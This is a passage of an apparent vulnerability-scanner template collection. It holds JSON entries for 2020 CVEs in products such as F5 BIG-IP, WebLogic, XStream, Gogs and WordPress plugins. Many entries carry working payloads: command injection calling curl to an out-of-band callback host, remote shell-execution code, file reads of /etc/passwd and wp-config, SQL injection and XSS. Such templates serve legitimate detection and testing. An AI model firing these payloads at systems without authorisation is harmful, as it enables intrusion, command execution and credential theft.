Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin","{{BaseURL}}/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["rel=\\\"admin\\\""]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11853","info":{"name":"Micro Focus Operations Bridge Manager <=2020.05 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ucmdb-api/connect"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["HttpUcmdbServiceProviderFactoryImpl","ServerVersion=11.6.0"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8772","info":{"name":"WordPress InfiniteWP <1.9.4.5 - Authorization Bypass","severity":"critical"},"requests":[{"raw":["GET /?author=1 HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Language: en-US,en;q=0.9\n","POST / HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: application/x-www-form-urlencoded\n\n_IWP_JSON_PREFIX_{{base64(\"{\\\"iwp_action\\\":\\\"add_site\\\",\\\"params\\\":{\\\"username\\\":\\\"{{username}}\\\"}}\")}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["wordpress_logged_in"]},{"type":"word","part":"body","words":["<IWPHEADER>"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username","group":1,"regex":["Author:(?:[A-Za-z0-9 -\\_=\"]+)?<span(?:[A-Za-z0-9 -\\_=\"]+)?>([A-Za-z0-9]+)<\\/span>"],"internal":true,"part":"body"},{"type":"regex","name":"username","group":1,"regex":["ion: https:\\/\\/[a-z0-9.]+\\/author\\/([a-z]+)\\/"],"internal":true,"part":"header"}]}]},{"id":"CVE-2020-8194","info":{"name":"Citrix ADC and Citrix NetScaler Gateway - Remote Code Injection","severity":"medium"},"requests":[{"raw":["GET /menu/guiw?nsbrand=1&protocol=nonexistent.1337\">&id=3&nsvpx=phpinfo HTTP/1.1\nHost: {{Hostname}}\nCookie: startupapp=st\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<jnlp codebase=\"nonexistent.1337\">"]},{"type":"word","part":"header","words":["application/x-java-jnlp-file"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15148","info":{"name":"Yii 2 < 2.0.38 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ=="],"matchers-condition":"and","matchers":[{"type":"word","words":["total","An internal server error occurred."],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-24550","info":{"name":"EpiServer Find <13.2.7 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://interact.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: https://interact.sh"]},{"type":"status","status":[301]}]}]},{"id":"CVE-2020-27982","info":{"name":"IceWarp WebMail 11.4.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(1)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13927","info":{"name":"Airflow Experimental <1.10.11 - REST API Auth Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/experimental/latest_runs"],"matchers":[{"type":"word","part":"body","words":["\"dag_run_url\":","\"dag_id\":","\"items\":"],"condition":"and"}]}]},{"id":"CVE-2020-11798","info":{"name":"Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/awcuser/cgi-bin/vcs_access_file.cgi?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["application/x-download","filename=passwd"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-6207","info":{"name":"SAP Solution Manager 7.2 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /EemAdminService/EemAdmin HTTP/1.1\nHost: {{Hostname}}\nSOAPAction: \"\"\nContent-Type: text/xml; charset=UTF-8\nConnection: close\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:adm=\"http://sap.com/smd/eem/admin/\"><soapenv:Header/><soapenv:Body><adm:getAllAgentInfo/></soapenv:Body></soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[":Envelope",":Body",":getAllAgentInfoResponse"],"condition":"and"},{"type":"word","part":"header","words":["text/xml","SAP NetWeaver Application Server"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27735","info":{"name":"Wing FTP 6.4.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/help/english/index.html?javascript:alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<frame name=\"hmcontent\" src=\"javascript:alert(document.domain)\" title=\"Content frame\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24589","info":{"name":"WSO2 API Manager <=3.1.0 - Blind XML External Entity Injection","severity":"critical"},"requests":[{"raw":["POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npayload=<%3fxml+version%3d\"1.0\"+%3f><!DOCTYPE+a+[+<!ENTITY+%25+xxe+SYSTEM+\"http%3a//{{interactsh-url}}\">%25xxe%3b]>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["Failed to install the generic artifact type"]}]}]},{"id":"CVE-2020-23972","info":{"name":"Joomla! Component GMapFP 3.5 - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /index.php?option={{component}}&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nReferer: {{BaseURL}}\nConnection: close\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"option\"\n\ncom_gmapfp\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"image1\"; filename=\"{{name}}.html.gif\"\nContent-Type: text/html\n\nprojectdiscovery\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"no_html\"\n\nno_html\n------WebKitFormBoundarySHHbUsfCoxlX1bpS--\n"],"payloads":{"component":["com_gmapfp","comgmapfp"]},"extractors":[{"type":"regex","regex":["window\\.opener\\.(changeDisplayImage|addphoto)\\(\"(.*?)\"\\);"],"part":"body"}]}]},{"id":"CVE-2020-2733","info":{"name":"JD Edwards EnterpriseOne Tools 9.2 - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/manage/fileDownloader?sec=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ACHCJK"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12127","info":{"name":"WAVLINK WN530H4 M30H4.V5030.190403 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportAllSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Login=","Password=","Model=","AuthMode="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35338","info":{"name":"Wireless Multiplex Terminal Playout Server <=20.2.8 - Default Credential Detection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/server/"],"headers":{"Authorization":"Basic OnBva29u"},"matchers-condition":"and","matchers":[{"type":"word","words":["<title>WMT Server playout"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5902","info":{"name":"F5 BIG-IP TMUI - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd","{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release","{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license","{{BaseURL}}/hsqldb%0a"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","BIG-IP release ([\\d.]+)","[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{7}","HSQL Database Engine Servlet"],"condition":"or"},{"type":"status","status":[200]}]},{"raw":["POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1\nHost: {{Hostname}}\n\ncommand=create%20cli%20alias%20private%20list%20command%20bash\n","POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1\nHost: {{Hostname}}\n\nfileName=%2Ftmp%2Fnonexistent&content=echo%20%27aDNsbDBfdzBSbGQK%27%20%7C%20base64%20-d\n","POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1\nHost: {{Hostname}}\n\ncommand=list%20%2Ftmp%2Fnonexistent\n","POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1\nHost: {{Hostname}}\n\ncommand=delete%20cli%20alias%20private%20list\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["h3ll0_w0Rld"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14408","info":{"name":"Agentejo Cockpit 0.10.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth/login?to=/92874%27;alert(document.domain)//280"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["redirectTo = '/92874';alert(document.domain)//280';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2551","info":{"name":"Oracle WebLogic Server - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/console/login/LoginForm.jsp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["10.3.6.0","12.1.3.0","12.2.1.3","12.2.1.4"],"condition":"or"},{"type":"word","part":"body","words":["WebLogic"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-20285","info":{"name":"ZZcms - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /user/login.php HTTP/1.1\nHost: {{Hostname}}\nReferer: xss\"/><img src=\"#\" onerror=\"alert(document.domain)\"/>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["fromurl\" type=\"hidden\" value=\"xss\"/><img src=\"#\" onerror=\"alert(document.domain)\"/>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35774","info":{"name":"twitter-server Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/histograms?h=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&fmt=plot_cdf&log_scale=true"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17456","info":{"name":"SEOWON INTECH SLC-130 & SLR-120S - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nbrowserTime=081119502020&currentTime=1597159205&expires=Wed%252C%2B12%2BAug%2B2020%2B15%253A20%253A05%2BGMT&Command=Submit&user=admin&password=admin\n","POST /cgi-bin/system_log.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nCommand=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13945","info":{"name":"Apache APISIX - Insufficiently Protected Credentials","severity":"medium"},"requests":[{"raw":["POST /apisix/admin/routes HTTP/1.1\nHost: {{Hostname}}\nX-API-KEY: edd1c9f034335f136f87ad84b625c8f1\nContent-Type: application/json\n\n{\n  \"uri\":\"/{{randstr}}\",\n  \"script\":\"local _M = {} \\n function _M.access(conf, ctx) \\n local os = require('os')\\n local args = assert(ngx.req.get_uri_args()) \\n local f =        assert(io.popen(args.cmd, 'r'))\\n local s = assert(f:read('*a'))\\n ngx.say(s)\\n f:close()  \\n end \\nreturn _M\",\n  \"upstream\":{\n    \"type\":\"roundrobin\",\n    \"nodes\":{\n      \"interact.sh:80\":1\n    }\n  }\n}\n","GET /{{randstr}}?cmd=id HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"action\":\"create\"","\"script\":","\"node\":"],"condition":"and"},{"type":"status","status":[201]}],"extractors":[{"type":"regex","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]}]}]},{"id":"CVE-2020-5410","info":{"name":"Spring Cloud Config Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13379","info":{"name":"Grafana 3.0.1-7.0.1 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1","{{BaseURL}}/grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["cloudflare.com","dns"],"condition":"and"},{"type":"word","part":"header","words":["image/jpeg"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11034","info":{"name":"GLPI <9.4.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?redirect=/\\/interact.sh/","{{BaseURL}}/index.php?redirect=//interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2020-25506","info":{"name":"D-Link DNS-320 - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/system_mgr.cgi? HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\nC1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'`\n","POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'` HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2020-22208","info":{"name":"74cms - ajax_street.php 'x' SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_street.php?act=alphabet&x=11\ufffd%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5({{num}}),9%20from%20qs_admin#"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-26217","info":{"name":"XStream <1.4.14 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<map>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString>\n      <flags>0</flags>\n      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n        <dataHandler>\n          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>\n            <contentType>text/plain</contentType>\n            <is class='java.io.SequenceInputStream'>\n              <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>\n                <iterator class='javax.imageio.spi.FilterIterator'>\n                  <iter class='java.util.ArrayList$Itr'>\n                    <cursor>0</cursor>\n                    <lastRet>-1</lastRet>\n                    <expectedModCount>1</expectedModCount>\n                    <outer-class>\n                      <java.lang.ProcessBuilder>\n                        <command>\n                          <string>curl</string>\n                          <string>http://{{interactsh-url}}</string>\n                        </command>\n                      </java.lang.ProcessBuilder>\n                    </outer-class>\n                  </iter>\n                  <filter class='javax.imageio.ImageIO$ContainsFilter'>\n                    <method>\n                      <class>java.lang.ProcessBuilder</class>\n                      <name>start</name>\n                      <parameter-types/>\n                    </method>\n                    <name>start</name>\n                  </filter>\n                  <next/>\n                </iterator>\n                <type>KEYS</type>\n              </e>\n              <in class='java.io.ByteArrayInputStream'>\n                <buf></buf>\n                <pos>0</pos>\n                <mark>0</mark>\n                <count>0</count>\n              </in>\n            </is>\n            <consumed>false</consumed>\n          </dataSource>\n          <transferFlavors/>\n        </dataHandler>\n        <dataLen>0</dataLen>\n      </value>\n    </jdk.nashorn.internal.objects.NativeString>\n    <string>test</string>\n  </entry>\n</map>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2020-15568","info":{"name":"TerraMaster TOS <.1.29 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3E{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","GET /include/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24903","info":{"name":"Cute Editor for ASP.NET 6.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/CuteSoft_Client/CuteEditor/Template.aspx?Referrer=XSS\";><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script></p>","System.Web"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11738","info":{"name":"WordPress Duplicator 1.3.24 & 1.3.26 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["File Transfer","application/octet-stream","attachment; filename=\"(wp-config\\.php|passwd)\""],"condition":"and"},{"type":"regex","part":"body","regex":["root:.*:0:0:","define\\('DB_(NAME|USER|PASSWORD|HOST|CHARSET|COLLATE)'"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27361","info":{"name":"Akkadian Provisioning Manager 4.50.02 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pme/media/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of /pme/media","Parent Directory"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-3580","info":{"name":"Cisco ASA/FTD Software - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nSAMLResponse=%22%3E%3Csvg/onload=alert(/{{randstr}}/)%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(/{{randstr}}/)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5284","info":{"name":"Next.js <9.3.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_next/static/../server/pages-manifest.json"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["\\{\"/_app\":\".*?_app\\.js\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27481","info":{"name":"Good Layers LMS Plugin <= 2.1.4 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=gdlr_lms_cancel_booking&id=(SELECT%201337%20FROM%20(SELECT(SLEEP(6)))MrMV)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, 'goodlayers-lms') || contains(body, 'goodlms')"],"condition":"and"}]}]},{"id":"CVE-2020-12054","info":{"name":"WordPress Catch Breadcrumb <1.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(123);>","catch-breadcrumb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14750","info":{"name":"Oracle WebLogic Server - Remote Command Execution","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /console/css/%252e%252e%252fconsole.portal HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\ncmd: curl {{interactsh-url}}\nContent-Type: application/x-www-form-urlencoded\n\n_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();\nweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();\njava.lang.reflect.Field field = adapter.getClass().getDeclaredField(\"connectionHandler\");\nfield.setAccessible(true);\nObject obj = field.get(adapter);\nweblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod(\"getServletRequest\").invoke(obj);\nString cmd = req.getHeader(\"cmd\");\nString[] cmds = System.getProperty(\"os.name\").toLowerCase().contains(\"window\") ? new String[]{\"cmd.exe\", \"/c\", cmd} : new String[]{\"/bin/sh\", \"-c\", cmd};\nif (cmd != null) {\n    String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter(\"\\\\A\").next();\n    weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod(\"getResponse\").invoke(req);\n    res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));\n    res.getServletOutputStream().flush();\n    res.getWriter().write(\"\");\n}executeThread.interrupt();\n\");\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["ADMINCONSOLESESSION="]},{"type":"regex","part":"body","regex":["<html><head></head><body>(.*)</body></html>"]}]}]},{"id":"CVE-2020-2140","info":{"name":"Jenkin Audit Trail <=3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample","{{BaseURL}}/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1>sample"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15867","info":{"name":"Gogs 0.5.5 - 0.12.2 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/create HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&private=on&description=&gitignores=&license=&readme=Default&auto_init=on\n","POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}}\n","GET /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\n","POST /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body_1","words":["content=\"Gogs"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true},{"type":"regex","name":"last_commit","group":1,"regex":["name=\"last_commit\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2020-13937","info":{"name":"Apache Kylin - Exposed Configuration File","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/kylin/api/admin/config"],"headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["config","kylin.metadata.url"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-20982","info":{"name":"shadoweb wdja v1.5.1 - Cross-Site Scripting","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["location.href='</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17453","info":{"name":"WSO2 Carbon Management Console <=5.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/carbon/admin/login.jsp?msgId=%27%3Balert(%27document.domain%27)%2F%2F"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'';alert('document.domain')//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-20300","info":{"name":"WeiPHP 5.0 - SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--+ "],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["52c69e3a57331081823331c4e69d3f2"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-8654","info":{"name":"EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code 